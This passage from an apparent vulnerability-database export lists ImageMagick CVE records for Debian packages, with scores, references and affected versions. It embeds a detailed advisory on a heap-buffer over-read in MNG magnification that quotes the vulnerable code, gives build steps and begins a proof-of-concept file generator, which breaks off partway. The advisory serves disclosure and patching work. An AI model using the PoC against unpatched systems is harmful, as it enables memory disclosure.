url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2021-3962

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-utsb-dc1p-jkcq

url VCID-uvpj-a8v5-ebgz

vulnerability_id VCID-uvpj-a8v5-ebgz

summary

Image Magick has a Memory Leak in coders/ashlar.c
Memory leak exists in `coders/ashlar.c`. The `WriteASHLARImage` allocates a structure.  However, when an exception is thrown, the allocated memory is not properly released, resulting in a potential memory leak.

```
```bash
==78968== Memcheck, a memory error detector
==78968== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==78968== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info
==78968== 
==78968== HEAP SUMMARY:
==78968==     in use at exit: 17,232 bytes in 4 blocks
==78968==   total heap usage: 4,781 allocs, 4,777 frees, 785,472 bytes allocated
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25969.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25969.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25969

reference_id

reference_type

scores

value	0.00018
scoring_system	epss
scoring_elements	0.04955
published_at	2026-04-26T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04916
published_at	2026-04-24T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04879
published_at	2026-04-21T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17931
published_at	2026-04-12T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17976
published_at	2026-04-11T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.1796
published_at	2026-04-09T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17899
published_at	2026-04-08T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17811
published_at	2026-04-07T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.18055
published_at	2026-04-02T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.1811
published_at	2026-04-04T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17835
published_at	2026-04-18T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17825
published_at	2026-04-16T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.17882
published_at	2026-04-13T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25969

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/a253d1b124ebdcc2832daac6f9a35c362635b40e

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/a253d1b124ebdcc2832daac6f9a35c362635b40e

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xgm3-v4r9-wfgm

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xgm3-v4r9-wfgm

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25969

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25969

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2442116
reference_id	2442116
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2442116

reference_url

https://github.com/advisories/GHSA-xgm3-v4r9-wfgm

reference_id

GHSA-xgm3-v4r9-wfgm

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-xgm3-v4r9-wfgm

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u6%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.15%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-25969, GHSA-xgm3-v4r9-wfgm

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uvpj-a8v5-ebgz

url VCID-uwbu-vzay-q3ak

vulnerability_id VCID-uwbu-vzay-q3ak

summary ImageMagick: NULL pointer dereference in GetMagickProperty function in MagickCore/property.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16329.json

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16329.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2018-16329

reference_id

reference_type

scores

value	0.00372
scoring_system	epss
scoring_elements	0.58869
published_at	2026-04-01T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58944
published_at	2026-04-02T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58967
published_at	2026-04-04T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58933
published_at	2026-04-07T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58985
published_at	2026-04-08T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.5899
published_at	2026-04-09T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.5901
published_at	2026-04-11T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58991
published_at	2026-04-21T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58973
published_at	2026-04-24T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.59007
published_at	2026-04-16T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.59011
published_at	2026-04-18T12:55:00Z

value	0.00372
scoring_system	epss
scoring_elements	0.58989
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2018-16329

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1624957
reference_id	1624957
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1624957

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2018-16329

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uwbu-vzay-q3ak

url VCID-vbdt-31wd-v3h8

vulnerability_id VCID-vbdt-31wd-v3h8

summary

imagemagick: heap-buffer overflow read in MNG magnification with alpha
## **Vulnerability Details**

When performing image magnification in `ReadOneMNGIMage` (in `coders/png.c`), there is an issue around the handling of images with separate alpha channels.

When loading an image with a color type that implies a separate alpha channel (ie. `jng_color_type >= 12`), we will load the alpha pixels in this loop:

```c
     if (logging != MagickFalse)
        (void) LogMagickEvent(CoderEvent,GetMagickModule(),
          "    Reading alpha from alpha_blob.");
      jng_image=ReadImage(alpha_image_info,exception);

      if (jng_image != (Image *) NULL)
        for (y=0; y < (ssize_t) image->rows; y++)
        {
          s=GetVirtualPixels(jng_image,0,y,image->columns,1,exception);
          q=GetAuthenticPixels(image,0,y,image->columns,1,exception); // [0]
          if ((s == (const Quantum *)  NULL) || (q == (Quantum *) NULL))
            break;

          if (image->alpha_trait != UndefinedPixelTrait)
            for (x=(ssize_t) image->columns; x != 0; x--)
            {
              SetPixelAlpha(image,GetPixelRed(jng_image,s),q);
              q+=(ptrdiff_t) GetPixelChannels(image);
              s+=(ptrdiff_t) GetPixelChannels(jng_image);
            }

          else
            for (x=(ssize_t) image->columns; x != 0; x--)
            {
              Quantum
                alpha;

              alpha=GetPixelRed(jng_image,s);
              SetPixelAlpha(image,alpha,q);
              if (alpha != OpaqueAlpha)
                image->alpha_trait=BlendPixelTrait; // [1]
              q+=(ptrdiff_t) GetPixelChannels(image);
              s+=(ptrdiff_t) GetPixelChannels(jng_image);
            }

          if (SyncAuthenticPixels(image,exception) == MagickFalse)
            break;
        }
```

Note that at \[1\] we update `image->alpha_trait`, but if our alpha image only contains non-opaque pixels in the last row, we do not call `GetAuthenticPixels` (at \[0\]) after this change has been made. 

The next call to `GetAuthenticPixels` will then call down into `ResetPixelChannelMap` which adds the new alpha channel to the image channel mappings and metadata.

If we then pass this image into the `MAGN` chunk type, we can see that at \[2\] we calculate the sizes for intermediate buffers `next` and `prev`, before calling `GetAuthenticPixels` at \[4\]. 

After the call at \[4\], the `image->num_channels` has increased to include the new alpha channel, and now `length` and the previously allocated `next` and `prev` buffers are too small. Fortunately `length` is always used when copying into the buffers, but when reading pixels from the buffers, we call `GetPixelXXX` which assumes the layout of the current image, which requires a larger allocation. 

The pixel copying loop will subsequently read beyond the end of the allocation at \[5\].

```c
               /* magnify the rows into the right side of the large image */

                if (logging != MagickFalse)
                  (void) LogMagickEvent(CoderEvent,GetMagickModule(),
                    "    Magnify the rows to %.20g",
                    (double) large_image->rows);
                m=(ssize_t) mng_info->magn_mt;
                yy=0;
                length=(size_t) GetPixelChannels(image)*image->columns; // [2]
                next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));
                prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));

                if ((prev == (Quantum *) NULL) ||
                    (next == (Quantum *) NULL))
                  {
                    if (prev != (Quantum *) NULL)
                      prev=(Quantum *) RelinquishMagickMemory(prev);
                    if (next != (Quantum *) NULL)
                      next=(Quantum *) RelinquishMagickMemory(next);
                    image=DestroyImageList(image);
                    ThrowReaderException(ResourceLimitError,
                      "MemoryAllocationFailed");
                  }

                n=GetAuthenticPixels(image,0,0,image->columns,1,exception); // [4]
                (void) memcpy(next,n,length);

                for (y=0; y < (ssize_t) image->rows; y++)
                {
                  if (y == 0)
                    m=(ssize_t) mng_info->magn_mt;

                  else if (magn_methy > 1 && y == (ssize_t) image->rows-2)
                    m=(ssize_t) mng_info->magn_mb;

                  else if (magn_methy <= 1 && y == (ssize_t) image->rows-1)
                    m=(ssize_t) mng_info->magn_mb;

                  else if (magn_methy > 1 && y == (ssize_t) image->rows-1)
                    m=1;

                  else
                    m=(ssize_t) mng_info->magn_my;

                  n=prev;
                  prev=next;
                  next=n;

                  if (y < (ssize_t) image->rows-1)
                    {
                      n=GetAuthenticPixels(image,0,y+1,image->columns,1,
                          exception);
                      (void) memcpy(next,n,length);
                    }

                  for (i=0; i < m; i++, yy++)
                  {
                    Quantum
                      *pixels;

                    assert(yy < (ssize_t) large_image->rows);
                    pixels=prev;
                    n=next;
                    q=GetAuthenticPixels(large_image,0,yy,large_image->columns,
                      1,exception);
                    if (q == (Quantum *) NULL)
                      break;
                    q+=(ptrdiff_t) (large_image->columns-image->columns)*
                      GetPixelChannels(large_image);

                    for (x=(ssize_t) image->columns-1; x >= 0; x--)
                    {
                      /* To do: get color as function of indexes[x] */
                      /*
                      if (image->storage_class == PseudoClass)
                        {
                        }
                      */

                      if (magn_methy <= 1)
                        {
                          /* replicate previous */
                          SetPixelRed(large_image,GetPixelRed(image,pixels),q);  // [5]
                          SetPixelGreen(large_image,GetPixelGreen(image,
                             pixels),q);
                          SetPixelBlue(large_image,GetPixelBlue(image,
                             pixels),q);
                          SetPixelAlpha(large_image,GetPixelAlpha(image,
                             pixels),q);
                        }
```

This can likely be used to leak subsequent memory contents into the output image.

The attached proof-of-concept triggers this issue and is not blocked by any of the default security policies.

## **Affected Version(s)**

The issue has been successfully reproduced:

- at commit `3e37a7f15fcb1aa80e6beae3898e684309c2ecbe`

- in stable release `7.1.2-0`

### **Build Instructions**

```shell
git clone https://github.com/imagemagick/imagemagick

cd imagemagick

export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -O0 -ggdb"
export CXXFLAGS="-fsanitize=address -O0 -ggdb"
export LDFLAGS="-fsanitize=address -O0 -ggdb"

./configure --disable-shared --disable-docs --with-jxl
make -j
```

## **Reproduction**

### **Test Case**

This testcase is a python script that will generate an MNG file which can be used to trigger the vulnerability.

```
import struct
import zlib

def chunk(tag, data):
    crc = zlib.crc32(tag + data) & 0xffffffff
    return struct.pack('>I', len(data)) + tag + data + struct.pack('>I', crc)

# Simple 128x1 RGB jpeg
jpeg = bytes([
  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01,
  0x01, 0x01, 0x01, 0x2c, 0x01, 0x2c, 0x00, 0x00, 0xff, 0xdb, 0x00, 0x43,
  0x00, 0x03, 0x02, 0x02, 0x03, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x04,
  0x03, 0x03, 0x04, 0x05, 0x08, 0x05, 0x05, 0x04, 0x04, 0x05, 0x0a, 0x07,
  0x07, 0x06, 0x08, 0x0c, 0x0a, 0x0c, 0x0c, 0x0b, 0x0a, 0x0b, 0x0b, 0x0d,
